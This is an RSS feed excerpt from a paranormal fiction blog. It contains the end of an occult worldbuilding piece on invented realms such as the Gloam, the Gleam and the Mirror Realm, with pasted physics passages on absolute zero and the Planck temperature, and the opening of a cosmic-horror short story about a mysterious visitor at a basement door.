<p>To reach the <strong>Gloam</strong> without drugs or heavy meditation is not impossible, but is very unlikely. The Gloam is no-man&#39;s land between us and oblivion. The Gloam is a gutter, a shadow of this world. Most people seek to avoid it, pass around it, or through it so quickly that it doesn&#39;t matter. Mirror walkers can avoid it, shadow walkers make frequent use of it. Vermin from this world and the Dreaming frequently cross over into the Gloam because it is easy to find food there. It is a place where, unlike the Fugue, our warmth is despised and hated. As such, tiny creatures wandering in to eat and dispose of those bits of us that remain is seen as a benefit, doubly so because their presence unnerves us. Spiders, rats, roaches, snakes, flies, maggots, all of them have negative connotations to most humans. To see them in the dark places just adds to our fear and the things that live in the Gloam feed on fear and despair.</p>

<p>They are called Shadow Things, Shadow People, Shadow Men, a thousand other names. They are sought out by some because they know everything. They know everything because shadows are everywhere and they are always listening.</p>

<p>They know everything and they do not lie. They could lie if they wanted to, but telling the truth generally hurts us more than lying to us, so they tell the truth. And that is the crux of their existence: oracles of truth of the most unfortunate kind, things you&#39;d rather not know. Things you can never forget once told.<br>
You don&#39;t have to visit the Gloam to find the Shadows. You can reach out to them in many ways. But offering blood, yours or someone else&#39;s is the easiest way. They love it when we spill blood. They love it when we are afraid.</p>

<p>And, remember, they are always listening.</p>

<p>Always.</p>

<p>—</p>

<p>The <strong>Gloam</strong> is also the home of Naralmtu, the God of Shadows. It is not something to be invoked on a whim and most who know of it never speak its name or write down a word about it. To know it is to be known by it and when the shadows take special interest in you, your life will be filled with cold despair, disappointment, hardship, and loss. There are those that worship it, however. The feed it the lifeblood of sacrificial humans and animals. They feed it their own blood. In exchange for knowledge, in exchange for turning the shadows against their enemies. Some followers know they are being used and drained just as surely as their victims, but they do not care. Temporary power over their finite lifetimes is reward enough for these empty souls.</p>

<p>I know a great deal more about this entity, but to write it down is to further imperil myself.</p>

<h1 id="the-gleam">The Gleam</h1>

<p>The Blazing World</p>

<p>Hyperspace</p>

<p>The Gleaming</p>

<p>If you have heard of the “<a href="Races%20and%20Species" rel="nofollow">machine elves</a>” then you have heard of the <strong>Gleam</strong>. Without drugs or a strong will and careful magick, this realm is impossible to comprehend. It is as far as our human minds can reach, to go further is to find nothing that can be described or understood. Do not take that as a challenge. Our bodies, our flesh is simply not capable of experiencing that many special dimensions. To put it another way, there are some directions in which we are unable to see. What would “up” mean to a stick figure living on a piece of paper? It is the same for us. The Gleam is the edge of this space. To our minds, it seems to extend forever in all directions, in colors without names, endlessly folding and unfolding itself, rejuvenating and decaying, being born and dying over and over. That is how our brains interpret the edge of 4 dimensional space-time when we try to peer beyond.</p>

<p>From there, if you can properly direct yourself, you can see the past or the future, you can see what might have been or what could never be. You can relive your favorite moment for eternity in just a few moments.<br>
The machine elves hang out on this barrier to greet travelers. It is in their nature to be jovial and helpful, but also chimeric and mischievous. They appear to us to be made of crystalline lattices shaped into insect-like bodies. Just like their entire realm, they are constantly folding and unfolding, becoming and unbecoming. They can, if they wish, project forms more suited to our senses and sometimes they may. Also, while their native language is one of thought pictures, impressions, and feeling, they can translate their ideas into our speech, though something is lost in the translation and it often sounds like they are talking over themselves, trying to mix various meanings together. Imagine the same conversation in each of your ears but with slightly different wording and at a slightly different pace. Now imagine that times a hundred.</p>

<p>The Gleam is a place of possibilities. That is why most of us seek it. You can see what we can be if we make the best choices and it may inspire you to be a better person. That&#39;s what the machine elves want. They want us to be the best versions of ourselves.</p>

<p>A single trip to the Gleam can turn anxiety into ecstasy and depression into hope.</p>

<p>—</p>

<p>A secret about the machine elves that most do not know. They are not the highest lifeforms in their plan of existence. In fact, they are barely more than what we would call bacteria or simple multicellular life. But such is the differences in our levels of reality that even the lowest among them is godlike by comparison. It&#39;s also why they are interested in us. We are a sapient species reaching out and we treat them with a level of awe and respect that they cannot find in their own world alone.</p>

<p>They line the “shore” of the “ocean” we swim up through, looking for lights to rescue. When we peak through, they surround us and so we are enlightened.</p>

<p>To meet a higher lifeform from their plane would likely be disastrous to a human mind, like gazing into infinity or a naked singularity.</p>

<p>The Gloam is about inevitably.</p>

<p>The Gleam is about possibility.</p>

<h1 id="ur">Ur</h1>

<p>When the <em>nothing</em> became <em>something</em>, yet still before the first vibration, before the first waveform, before the first Planck length had been crossed, there was Ur, The First Place, the Ocean of Creation.</p>

<p>It is just as much a furnace, boiling and churning raw possibilities, recombining them into new things while simultaneously devouring and recycling the old with no care as to which. It has no guiding consciousness, no blueprints or plans, no thoughts of its own to speak of.</p>

<p>It is chance.</p>

<p>It is random.</p>

<p>But it is also eternal.</p>

<p>Given time, moments of apparent order can arise out of chaos. If they are quick and lucky, some few of these <em>moments</em> break free, find the surface, crawl away, and seep into other realms. It is from those stolen remnants that everything we know to exist arose.</p>

<p>The borders of Ur are filled with rotting carcasses of failed escapees and the trails, some wide and ragged, some so small as to be invisible, from those that made it. Be wary of stragglers or new arrivals who, eager for energy or ignorant of their strength, may seek you out and do you harm.</p>

<p>Under no circumstances should any living thing deign to enter Ur itself. It&#39;s driving nuclear engine would rip apart anyone or anything foolish enough to slip under its surface faster than the speed of light.</p>

<p>It is said that certain creatures, those acquainted with chaos, know ways to traverse the waters safely, but they are known to traffic in lies and half-truths. To put your faith in anything they offer in regards to Ur is more suicidal than simply foolish.</p>

<p>Why would anyone seek out such a place?</p>

<p>Change is seductive, to be someone else, to be <em>better</em>.</p>

<p>Perhaps you are terminally ill.</p>

<p>Perhaps you are hopeless.</p>

<p>Perhaps you are stuck, broken, lonely, inadequate, afraid, incomplete.</p>

<p>Would you be willing to throw your life into a blender and pray you retain your “self” in the recombination?</p>

<p>Would you be so unsatisfied with your current life that you are willing to risk complete dissolution?</p>

<p>Or perhaps.</p>

<p>Perhaps.</p>

<p>You <em>prefer</em> to be undone.</p>

<p>There are those who have been so traumatized by the act of living in the world as it is that they wish to escape into emptiness and leave nothing behind. They do not care for legacies. They do not see “the future” as anything but a continual slide into pain, isolation, and loneliness. They see the truth: entropy is inevitable.</p>

<p>But instead of seeking strength or fellowship, they choose to forget and to be forgotten.</p>

<p>What they do not understand is that Ur is rebirth. They will cease, but every bit of everything that made them who they were will be repurposed and reused to make another or billions of others stretched and threaded until unrecognizable.</p>

<p>True endings are only available from embracing Oblivion, from the orthogonal path back to the beginning, back to the ending. Only there can everything be truly nothing, forever and ever.</p>

<p>—</p>

<p>Nessianna Inmenna operates out of Ur. To her, the radioactive waters are like a warm bath, a comfort.</p>

<h1 id="elysium-nirvana">Elysium / Nirvana</h1>

<p>Imagine a party that never ends spanning worlds filled with abundant life. That is <strong>Elysium</strong>, also called <strong>Nirvana</strong>.<br>
A “party” is something with a different definition for each culture. For some it is a celebration of excess. For others, it may be an acknowledgement that you finally understand that you have no desires at all. For both, it is a place without responsibilities.</p>

<p>Elysium is a paradise of wanting and needing nothing, whether this is because everything is provided that you could possibly want or a place of emptiness because all worldly concerns have vanished, you will find it here and you will be at peace.</p>

<h1 id="epicurea">Epicurea</h1>

<p><strong>Epicurea</strong> is another world of plenty, but it does not give those who visit anything for free. You must work to find what you desire, but it is here. It is always here and you may find it if you pass the tests, survive the gauntlets, answer the riddles. It is a plane of growth and perseverance.</p>

<p>Unlike Elysium, here, you can fail. You may not solve the puzzles on the first try. You may not find your way through the maze. But you can try again.</p>

<h1 id="hell">Hell</h1>

<p><strong>Hell</strong> is not a place intended for punishment, not directly. Hell is a place for refinement and growth. Some who find themselves here may never realize that and they may be “tortured” for eternity. Others may thrive, find themselves, rarified, and leave freely as something greater than what arrived.</p>

<p>Hell is not a single place or a single experience. It is something that builds itself around the expectations of its inhabitants. Many may share the same Hell or Hells, but that is a quirk of organized religion planting the same set of <em>expectations</em> in the minds of billions.</p>

<h1 id="nuntius">Nuntius</h1>

<p><strong>Nuntius</strong> is a realm of secrets, of knowledge, of every book that could ever be written. It is also a plane full of lies and deception so the traveler must be cautious and careful.</p>

<p>One can find the Akashic Record here, but there is no helpful librarian, no card catalog or directory, and any one book is just as likely to be a fake as to be genuine. Additionally, a single wrong step and you may find yourself in the The Library of Babel instead and that path is guaranteed madness.</p>

<h1 id="vitrium">Vitrium</h1>

<p>Imagine a world where every tree, every insect, every blade of grass, every gust of air is broadcasting every detail of itself to every other thing, all the time. It is a world of perfect, unfiltered information; a place where there are no secrets.</p>

<p>To visit <strong>Vitrium</strong> is to be laid bare to yourself and everyone else. There are no shadow selves here, no lies or deception, only Truth.</p>

<p>For a human mind, the raw experience of such a place is a meaningless cacophony, too wide, too deep, too bright, too loud. It is impossible to process.</p>

<h1 id="acceptance-obsequium">Acceptance / Obsequium</h1>

<p>Obedience, Submission, Compliance, Resignation</p>

<p>Concerned with <em>how</em></p>

<p>Science, Religion, Rules, anything with codified and definitive answers, anything that replaces <em>warm hope</em> with <em>cold truth</em>.</p>

<p>Passive while <em>appearing</em> Active.</p>

<h1 id="insight-consilium">Insight / Consilium</h1>

<p>Insight, Discernment, Understanding</p>

<p>Concerned with <em>why</em></p>

<p>Introspection, Mindfulness, experience over explanation, seeing and being over knowing.</p>

<p>Active while <em>appearing</em> Passive.</p>

<h1 id="addendum-1-oblivion">Addendum 1: Oblivion</h1>

<p>The Blight</p>

<p>Singularity</p>

<p>Nowhere</p>

<p>Nowhen</p>

<p>Absolute Zero</p>

<p>Before existence, there was Oblivion. Eternal because time had not yet ticked its first. Limitless because space had not yet been borne. It was nothing and everything. Potential without ignition, less than the sum of its parts. It is absolute entropy and the state to which every universe seeks to return.</p>

<p><strong>Naralmtu</strong> serve The Blight.</p>

<h2 id="absolute-zero">Absolute Zero</h2>

<p><a href="https://en.wikipedia.org/wiki/Absolute_zero" rel="nofollow">https://en.wikipedia.org/wiki/Absolute_zero</a>
<strong>Absolute zero</strong> is the lowest possible <a href="https://en.wikipedia.org/wiki/Temperature" title="Temperature" rel="nofollow">temperature</a>, a state at which a system&#39;s <a href="https://en.wikipedia.org/wiki/Internal_energy" title="Internal energy" rel="nofollow">internal energy</a>, and in ideal cases <a href="https://en.wikipedia.org/wiki/Entropy" title="Entropy" rel="nofollow">entropy</a>, reach their minimum values. The <a href="https://en.wikipedia.org/wiki/Kelvin_scale" title="Kelvin scale" rel="nofollow">Kelvin scale</a> is defined so that absolute zero is 0 K, equivalent to −273.15 °C on the <a href="https://en.wikipedia.org/wiki/Celsius" title="Celsius" rel="nofollow">Celsius scale</a>,<a href="https://en.wikipedia.org/wiki/Absolute_zero#cite_note-sib2115-1" rel="nofollow">[1]</a><a href="https://en.wikipedia.org/wiki/Absolute_zero#cite_note-arora-2" rel="nofollow">[2]</a> and −459.67 °F on the <a href="https://en.wikipedia.org/wiki/Fahrenheit_scale" title="Fahrenheit scale" rel="nofollow">Fahrenheit scale</a>.<a href="https://en.wikipedia.org/wiki/Absolute_zero#cite_note-3" rel="nofollow">[3]</a> The Kelvin and <a href="https://en.wikipedia.org/wiki/Rankine_scale" title="Rankine scale" rel="nofollow">Rankine</a> temperature scales set their zero points at absolute zero by design. This limit can be estimated by extrapolating the <a href="https://en.wikipedia.org/wiki/Ideal_gas_law" title="Ideal gas law" rel="nofollow">ideal gas law</a> to the temperature at which the volume or pressure of a classical gas becomes zero.</p>

<p>At absolute zero, there is no <a href="https://en.wikipedia.org/wiki/Thermal_motion" title="Thermal motion" rel="nofollow">thermal motion</a>. However, due to <a href="https://en.wikipedia.org/wiki/Quantum_mechanics" title="Quantum mechanics" rel="nofollow">quantum effects</a>, the particles still exhibit minimal motion mandated by the <a href="https://en.wikipedia.org/wiki/Uncertainty_principle" title="Uncertainty principle" rel="nofollow">Heisenberg uncertainty principle</a> and, for a system of fermions, the <a href="https://en.wikipedia.org/wiki/Pauli_exclusion_principle" title="Pauli exclusion principle" rel="nofollow">Pauli exclusion principle</a>. Even if absolute zero could be achieved, this residual quantum motion would persist.</p>

<p>Although absolute zero can be approached, it cannot be reached. Some <a href="https://en.wikipedia.org/wiki/Isentropic_process" title="Isentropic process" rel="nofollow">isentropic processes</a>, such as <a href="https://en.wikipedia.org/wiki/Adiabatic_expansion" title="Adiabatic expansion" rel="nofollow">adiabatic expansion</a>, can lower the system&#39;s temperature without relying on a colder medium. Nevertheless, the <a href="https://en.wikipedia.org/wiki/Third_law_of_thermodynamics" title="Third law of thermodynamics" rel="nofollow">third law of thermodynamics</a> implies that no physical process can reach absolute zero in a finite number of steps. As a system nears this limit, further reductions in temperature become increasingly difficult, regardless of the cooling method used. In the 21st century, scientists have achieved temperatures below 100 picokelvin (pK). At low temperatures, matter displays exotic quantum phenomena such as <a href="https://en.wikipedia.org/wiki/Superconductivity" title="Superconductivity" rel="nofollow">superconductivity</a>, <a href="https://en.wikipedia.org/wiki/Superfluidity" title="Superfluidity" rel="nofollow">superfluidity</a>, and <a href="https://en.wikipedia.org/wiki/Bose%E2%80%93Einstein_condensation" rel="nofollow">Bose–Einstein condensation</a>.</p>

<h1 id="addendum-2-rapture">Addendum 2: Rapture</h1>

<p>The Bloom</p>

<p>The Song</p>

<p>Ecstasy</p>

<p>Exultation</p>

<p>Ubiquity</p>

<p>Omnilarity</p>

<p>Everywhere</p>

<p>Everywhen</p>

<p>Quantum Foam</p>

<p>Everything that can exist, does exist here. Everything that cannot exist, exists here. Everything that was and was not, what will be and will not be, exists here. This is all things, all times, all places, all thoughts, all possibilities and impossibilities.</p>

<p>This is the first moment, before any rules have been established, before up is up and down is down.</p>

<p><strong>Ohmadrundi</strong> (a subset of machine elves) serve The Bloom.</p>

<p><strong><em>IMAGE MISSING</em></strong></p>

<h2 id="absolute-hot-planck-temperature">Absolute Hot (Planck Temperature)</h2>

<p>[[What Is The Hottest Temperature in The Known Universe, And Could We Achieve It]]
<a href="https://www.straightdope.com/21341968/what-is-the-opposite-of-absolute-zero" rel="nofollow">https://www.straightdope.com/21341968/what-is-the-opposite-of-absolute-zero</a>
There is a limit, sort of, but it’s so inconceivably large that nobody but high energy physicists talks about it (although as I think about it absolute zero doesn’t exactly qualify as breakfast table chatter either). The highest possible temperature, called the Planck temperature, is equal to 10<sup>32</sup> degrees Kelvin. For comparison, the center of the sun bubbles along at 15 million K (15 x 10<sup>6</sup>); silicon can be created by fusion at 1 billion K (10<sup>9</sup>). In short, the Planck temperature is very toasty indeed.</p>

<p>Some scientists believe that we, or at least our universe, have already experienced the Planck temperature, although it went by so quickly you may have missed it. It occurred at 10 <sup>-43</sup> of a second after the Big Bang, the great cataclysm in which the universe was born. (10 <sup>-43</sup>  of a second, in case you’re not hip to the notation, is an incredibly tiny fraction of time. Time enough to create the universe, but not, as a University of Chicago physicist was once at pains to explain, time enough to get off a disputed last-tenth-of-a-second shot against the Chicago Bulls.)</p>

<p>Absolute zero is easier to understand than the Planck temperature. What we perceive as heat is a function of motion. The colder something gets, the less internal motion or vibration its molecules exhibit. At absolute zero — that is, zero Kelvin or -460° Fahrenheit — molecular motion virtually stops. At that point whatever the molecules are a part of is as cold as it’s going to get.</p>

<p>There’s a lot more latitude in the opposite direction. The faster molecules move, the hotter they get. At 10<sup>10</sup> K electrons approach the speed of light, but they also become more massive, so their temperature can continue to rise. At 10<sup>32</sup> K such staggering densities obtain that greater temperature would cause each particle of matter to become its own black hole, and the usual understanding of space and time would collapse. Ergo, the Planck temperature is as hot as things can get. Or at least it’s the highest temp conceivable in present theory. There’s a chance when a quantum theory of gravity is worked out we may find even higher temperatures are possible. The prospect, frankly, leaves me cold.</p>

<h1 id="addendum-3-the-mirror-realm">Addendum 3: The Mirror Realm</h1>

<p>Also called “Ouroboros”</p>

<p>Chirality is not a word you are likely to hear in every day conversation, but it is at the heart of the final place we must consider: The Mirror Realm.</p>

<p>To understand the idea simply, look at your hands. Despite the fact that they seem functionally identical at first glance, there is no direction or method by which your left hand could be held or manipulated into being your right hand.</p>

<p>This feature of our reality is called “chirality” – there are structures that cannot be reshaped into their mirror images without destroying them or fundamentally changing their function.</p>

<p>This “handedness” goes deeper than our hands and into our DNA, the food we eat, the forces and fields that bind our base elements together and allow us to exist as complex, thinking biological systems and further extends into the other places written above.</p>

<p>There is a preferred <em>direction</em> in which we all twist that cannot be undone. Our multiverse is incompatible with the idea. To whit, “mirror” proteins cannot nourish us and “mirror” energies would be vastly different in how they functioned and may not function at all.</p>

<p>And yet, we see into a world that flips the direction effortlessly every time we see our own reflection in a mirror.</p>

<p>Mirrors offer us a window into another reality which resembles ours but where the rules are very different. As I said, we can easily <em>project</em> an image of ourselves into this version of reality, but could we truly step into it?</p>

<p>Before answering that, let us discuss the art of scrying, divining by looking into something akin to a black mirror or, rather, looking <em>beneath</em> the surface of the black mirror. Why would scrying produce tangible results? Why would peering into a reflection of our own world provide any insight into our own?</p>

<p>I have already mentioned that the <em>laws</em> are different in that place, but you must also consider how freely we <em>reflect</em>. Every drop of water and snowflake, every pane of glass, every polished boot, every silver earring, every chrome pipe, every phone screen and television, every set of mirrors attached to automobiles, produce reflections. Our entire world is reflected into this mirror realm. It is impossible to <strong>not</strong> reflect ourselves multiple time a day.</p>

<p>To scry is to peer <em>sideways</em> into the mirror realm and find insight. It is too look <em>beyond</em> your own reflection, to ignore it and see what lies behind it and beneath it. The scryer finds our own reality broken into pieces, fragmented, seen from a thousand different angles, atomized and rarefied down to essentials. The wise mind understands how to combine these snippets into a clearer picture of the whole than if they had seen it firsthand. This direction, seeing the <em>back</em> of reality, the mirror, gives them insight which can be translated back into truths valid in our own reality.</p>

<p>If such power can be had by simply <em>looking</em> how much greater would it be to <em>walk</em> within?</p>

<p>As I have said, chirality means the essence of our reality is not compatible with the mirror realm. There is life there, of a kind, but not life we would recognize. Monstrous life that only moves when we aren’t looking because our <em>perception</em> of it from our side of the glass renders it invisible and freezes it in time. Stare at a mirror in the dark long enough and you will start to see evidence of them in the way your own reflection morphs into something unrecognizable. But they cannot hurt us and we cannot harm them. We are simply incompatible.</p>

<p>However, if someone were step <em>through</em> the mirror, into the mirror realm itself, then we become briefly tethered to their reality. For a short time, we can breathe the air, we can walk along the surfaces, we can hear and see. All the while, our flesh is fighting an invisible battle against molecules that are not designed for us. A buzzing in the ears, a bloody nose, blurry vision, hallucinations, nausea.</p>

<p>And the things that live there are slowly but surely no longer bound by our perception. They turn their multifaceted eye stalks and twitch with unexpected motion, able to watch and plan.</p>

<p>How do you think an intelligent creature would feel about finally being able to confront one of those hateful things whose very gaze once paralyzed them?</p>

<p>Mirror Walkers claim that time does not pass for them on the other side of the glass. They will tell you that they cross incalculable distances in fractions of a second and that there is no living thing on the other side that can catch them because of the speed with which they traverse the place.</p>

<p>It is up to you whether or not you wish to believe them.</p>

<h1 id="addendum-4-the-in-between">Addendum 4: The In Between</h1>

<p>The In Between is a strange corollary to The Mirror Realm, a place visited by few and often whispered of as if little more than a fairy tale.</p>

<p>In stories, it is a stale, stagnant place outside of time yet <em>between</em> spaces. One could stay here forever and never age a day. The only cost being ambition and drive.</p>

<p>At the edges, a visitor can see out but cannot be seen, making it an ideal method of clandestine information gathering.</p>

<p>Why would this place be considered a sibling to The Mirror Realm?</p>

<p>The most common way to enter The In Between is to step inside a wall.</p>

<h1 id="addendum-5-the-fae">Addendum 5: The Fae</h1>

<p>They exist. They flit between layers of reality as easily as turning a page in a book. But where are they <strong>from</strong>? Where do they <strong>live</strong>?</p>

<p>I can only speculate. Even the shadows merely cough and gasp in what passes for their laughter when I ask, refusing to give an answer.</p>

<p>Perhaps the answer lies in other liminal, transitional places such as The Fugue or The In Between. Perhaps the answer is in yet <em>another</em> nameless direction in which I will have to learn to peer. That would at least explain why they are so <em>unpredictable</em>: they operate under a different set of rules, entirely.</p>

<hr>

<p>#Psychomancer
#Writer #Writing #Writers #WritingCommunity #WritersOfMastodon #ShortFiction #ParanormalFiction</p>
]]></content:encoded>
      <author>Psychomancer</author>
      <guid>https://infosec.press/read/a/qmjx3pvwlh</guid>
      <pubDate>Sat, 21 Feb 2026 07:50:52 +0000</pubDate>
    </item>
    <item>
      <title>There was a Knock</title>
      <link>https://infosec.press/psychomancer/there-was-a-knock</link>
      <description>&lt;![CDATA[The mi-go, the elder things, the flying polyps, even the shoggoth and deep ones, are all corporeal beings made of the same stuff of our universe. They have alien minds by way of evolving on alien worlds in alien environments. Their science, while fantastic, obeys the same Laws as ours. Given a proper education, we could understand it, even replicate it. Only The Great Race approaches the power of those Outside and yet even they were once like us, ephemeral and bound to flesh.&#xA;&#xA;But we are more than flesh and electrical impulses. Science tells us that our bodies are home to countless symbiotic lifeforms on our skin, in our guts. We constantly shed and regrow cells. We collect new memories and ideas. We change and adapt.&#xA;&#xA;We peer into other worlds when we dream, when we meditate, by psychedelics and deliriants. We perceive hints and glimpses of vistas beyond our grasp, places our bodies—built of atoms and molecules—cannot go. These worlds are just as real, just as vibrant.&#xA;&#xA;And natives of those worlds are as likely to peer back as we are to stare at a slide under a microscope. Some even &#34;project&#34; something of themselves down to our level as emissaries or explorers such as many-named Nyarlet&#39;hotep and its lesser-known siblings NAM, NUM, and IM.&#xA;&#xA;But we cannot understand them, even when their avatars walk among us. Their true forms exist in realities that need not obey our Laws with minds borne in and inhabiting dimensions we cannot comprehend, describe, or name. We can&#39;t even truly look at them because, to us, those angles, do not exist.&#xA;&#xA;We call them gods and goddesses, for lack of a better word. We assign them domains and temperaments. We make to assume we know what thoughts and offerings they find pleasing. We build entire pantheons based on our own slight, imperfect impressions of them.&#xA;&#xA;Is it any wonder that imps, gremlins, fae, demons, all the so-called &#34;lesser&#34; outsiders vex us? How ridiculous we must seem, building temples based on nonsense and guesses. Do they try to guide or mock us? Who can say? Their minds and motives are just as alien.&#xA;&#xA;So who did I meet that unusually warm Saturday night?&#xA;&#xA;I lounged on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime when there was a knock at my door.&#xA;&#xA;Not my front door, nor my back door.&#xA;&#xA;It came from my basement door.&#xA;&#xA;If I were a cat, my hackles would be raised. Instead, a sort of panic hit, wide-eyed, pounding heart, almost forgot to breathe, spine thoroughly chilled.&#xA;&#xA;I have no guns no serious weapons save a ceremonial sword mounted much too far out of reach.&#xA;&#xA;I do not remember standing or walking, but when I opened the door, there stood a short, smiling man with terrible teeth in a tailored suit at the top of my stairs.&#xA;&#xA;I can&#39;t recall seeing his eyes.&#xA;&#xA;&#34;Excellent!&#34; he said in a thick British accent stolen from Austin Powers.&#xA;&#xA;&#34;This is one where you listen.&#34;&#xA;&#xA;&#34;Are you doing a bit?&#34; I grasped, looking past him for a cameraman or some hint that this was a misguided joke.&#xA;&#xA;&#34;A bit?&#34; He rubbed his chin with his right hand. &#34;I don&#39;t think so.&#34;&#xA;&#xA;He offered his left hand.&#xA;&#xA;&#34;Archibald Horatio Pierse, IV,&#34; he said, overly emphasizing The Fourth as if it was of great importance. &#34;Pierse with an &#39;s&#39;,&#34; concluded his introduction.&#xA;&#xA;He was still shaking my hand, which I didn&#39;t remember offering in return.&#xA;&#xA;&#34;Sometimes,&#34; he said. &#34;I like to pop in and give a bloke or bird whose almost got it a little glimpse of the whole.&#34;&#xA;&#xA;&#39;bloke or bird,&#39; I thought. This has to be a bit.&#xA;&#xA;&#34;Right,&#34; he said, no longer shaking my left hand, but still holding it.&#xA;&#xA;The world fractured, splintered. Every cell pulled in a different direction.&#xA;&#xA;Immediately, I saw The Lie of Leng. We are not our flesh extruded ever forward through time.&#xA;&#xA;We extend forward, backward, up, down, left, right, perpendicular, acute, obtuse, curves, spirals, loops, dead ends.&#xA;&#xA;We are infinite, each possibility of us, and our varied consciousnesses cross and zigzag each other as we live and choose, each subtly pulling the others.&#xA;&#xA;There is no pattern, no spider&#39;s web, no order. Each life follows cause and effect but the tides of every other shift and shuffle the connecting threads bringing luck, both good and bad, chance, uncertainty.&#xA;&#xA;When we dream, we are free to reach into the other us-es and become them for a time. Here, I am a demigod, a builder of aqueducts; here, I am a psychic investigator who helps ghosts cross-over; here, I am a homeless amphibious mutant, living peacefully in the mud; here, the world is invaded by body stealing alien mantids; here, Kaiju shatter cities and I use telekinesis to protect a band of survivors.&#xA;&#xA;Gender, race, nationality, species, moral character, upbringing: I am every possibility.&#xA;&#xA;I am every drop in the ocean and the ocean itself.&#xA;&#xA;I am the sky, the moon, the stars, a worm, a bacteria, a lichen.&#xA;&#xA;The one who showed me—I had forgotten he existed—he bade me, &#34;turn around.&#34;&#xA;&#xA;What a strange request! I am all that is and was. Do I not already &#34;see&#34; in every direction?&#xA;&#xA;&#34;Turn around.&#34;&#xA;&#xA;A trillion trillion trillion hands gently guide each part of me, facing my infinite gazes in a new direction.&#xA;&#xA;Syzygy.&#xA;&#xA;I am All, yet All That is Not Me is also All.&#xA;&#xA;I see the tapestry, the enmeshed pattern.&#xA;&#xA;The beauty.&#xA;&#xA;The belonging.&#xA;&#xA;The Love.&#xA;&#xA;Every part of me weeps.&#xA;&#xA;An infinity of infinities.&#xA;&#xA;Each unique.&#xA;&#xA;Together, whole.&#xA;&#xA;Like curtains dancing in the breeze.&#xA;&#xA;Like a rainstorm.&#xA;&#xA;Like staring at the sun.&#xA;&#xA;Like the song of cicadas.&#xA;&#xA;Unity.&#xA;&#xA;From the Great Boiling Seas of Ur to the Blindness of Effervescence to the Stasis of Effluvia to the Paralysis of Approaching the Akashic Record to the Singing Knowledge Trees of Vitrium to and to and to and to and to and to…&#xA;&#xA;All is One and One is All.&#xA;&#xA;Then I&#39;m lounging on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime.&#xA;&#xA;And I can&#39;t stop crying.&#xA;&#xA;---&#xA;&#xA;I think I will stretch you sideways.&#xA;I think I shall stretch you sideways.&#xA;Why don&#39;t I show you what sideways looks like?&#xA;How about sideways?&#xA;What about sideways&#34;?&#xA;I&#39;d like to show your sideways.&#xA;&#xA;I thinkdon&#39;t I willshall I showstretchsideways youwhatsideways looks like.&#xA;&#xA;---&#xA;&#xA;#Psychomancer #CthulhuMythos #Writer #Writing #Writers #WritingCommunity #ShortFiction #Fiction #Paranormal]]&gt;</description>
      <content:encoded><![CDATA[<p>The mi-go, the elder things, the flying polyps, even the shoggoth and deep ones, are all corporeal beings made of the same stuff of our universe. They have alien minds by way of evolving on alien worlds in alien environments. Their science, while fantastic, obeys the same Laws as ours. Given a proper education, we could understand it, even replicate it. Only The Great Race approaches the power of those Outside and yet even they were once like us, ephemeral and bound to flesh.</p>

<p>But we are more than flesh and electrical impulses. Science tells us that our bodies are home to countless symbiotic lifeforms on our skin, in our guts. We constantly shed and regrow cells. We collect new memories and ideas. We change and adapt.</p>

<p>We peer into other worlds when we dream, when we meditate, by psychedelics and deliriants. We perceive hints and glimpses of vistas beyond our grasp, places our bodies—built of atoms and molecules—cannot go. These worlds are just as real, just as vibrant.</p>

<p>And natives of those worlds are as likely to peer back as we are to stare at a slide under a microscope. Some even “project” something of themselves down to our level as emissaries or explorers such as many-named Nyarlet&#39;hotep and its lesser-known siblings NAM, NUM, and IM.</p>

<p>But we cannot understand them, even when their avatars walk among us. Their true forms exist in realities that need <strong>not</strong> obey our Laws with minds borne in and inhabiting dimensions we cannot comprehend, describe, or name. We can&#39;t even truly <em>look</em> at them because, to us, those angles, do not exist.</p>

<p>We call them gods and goddesses, for lack of a better word. We assign them domains and temperaments. We make to assume we know what thoughts and offerings they find pleasing. We build entire pantheons based on our own slight, imperfect impressions of them.</p>

<p>Is it any wonder that imps, gremlins, fae, demons, all the so-called “lesser” outsiders vex us? How ridiculous we must seem, building temples based on nonsense and guesses. Do they try to guide or mock us? Who can say? Their minds and motives are just as alien.</p>

<p>So who did I meet that unusually warm Saturday night?</p>

<p>I lounged on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime when there was a knock at my door.</p>

<p>Not my front door, nor my back door.</p>

<p>It came from my basement door.</p>

<p>If I were a cat, my hackles would be raised. Instead, a sort of panic hit, wide-eyed, pounding heart, almost forgot to breathe, spine thoroughly chilled.</p>

<p>I have no guns no serious weapons save a ceremonial sword mounted much too far out of reach.</p>

<p>I do not remember standing or walking, but when I opened the door, there stood a short, smiling man with terrible teeth in a tailored suit at the top of my stairs.</p>

<p>I can&#39;t recall seeing his eyes.</p>

<p>“Excellent!” he said in a thick British accent stolen from Austin Powers.</p>

<p>“This is one where you <em>listen</em>.”</p>

<p>“Are you doing a bit?” I grasped, looking past him for a cameraman or some hint that this was a misguided joke.</p>

<p>“A bit?” He rubbed his chin with his right hand. “I don&#39;t think so.”</p>

<p>He offered his left hand.</p>

<p>“Archibald Horatio Pierse, IV,” he said, overly emphasizing <strong>The Fourth</strong> as if it was of great importance. “Pierse with an &#39;s&#39;,” concluded his introduction.</p>

<p>He was still shaking my hand, which I didn&#39;t remember offering in return.</p>

<p>“Sometimes,” he said. “I like to <strong>pop in</strong> and give a bloke or bird whose <em>almost</em> got it a little glimpse of the whole.”</p>

<p>&#39;bloke or bird,&#39; I thought. This <em>has</em> to be a bit.</p>

<p>“Right,” he said, no longer shaking my left hand, but still holding it.</p>

<p>The world fractured, splintered. Every cell pulled in a different direction.</p>

<p>Immediately, I saw The Lie of Leng. We are not our flesh extruded ever forward through time.</p>

<p>We extend forward, backward, up, down, left, right, perpendicular, acute, obtuse, curves, spirals, loops, dead ends.</p>

<p>We are infinite, each possibility of us, and our varied consciousnesses cross and zigzag each other as we live and choose, each subtly pulling the others.</p>

<p>There is no pattern, no spider&#39;s web, no order. Each life follows cause and effect but the tides of every other shift and shuffle the connecting threads bringing luck, both good and bad, chance, uncertainty.</p>

<p>When we dream, we are free to reach into the other us-es and <em>become</em> them for a time. Here, I am a demigod, a builder of aqueducts; here, I am a psychic investigator who helps ghosts cross-over; here, I am a homeless amphibious mutant, living peacefully in the mud; here, the world is invaded by body stealing alien mantids; here, Kaiju shatter cities and I use telekinesis to protect a band of survivors.</p>

<p>Gender, race, nationality, <em>species</em>, moral character, upbringing: I am every possibility.</p>

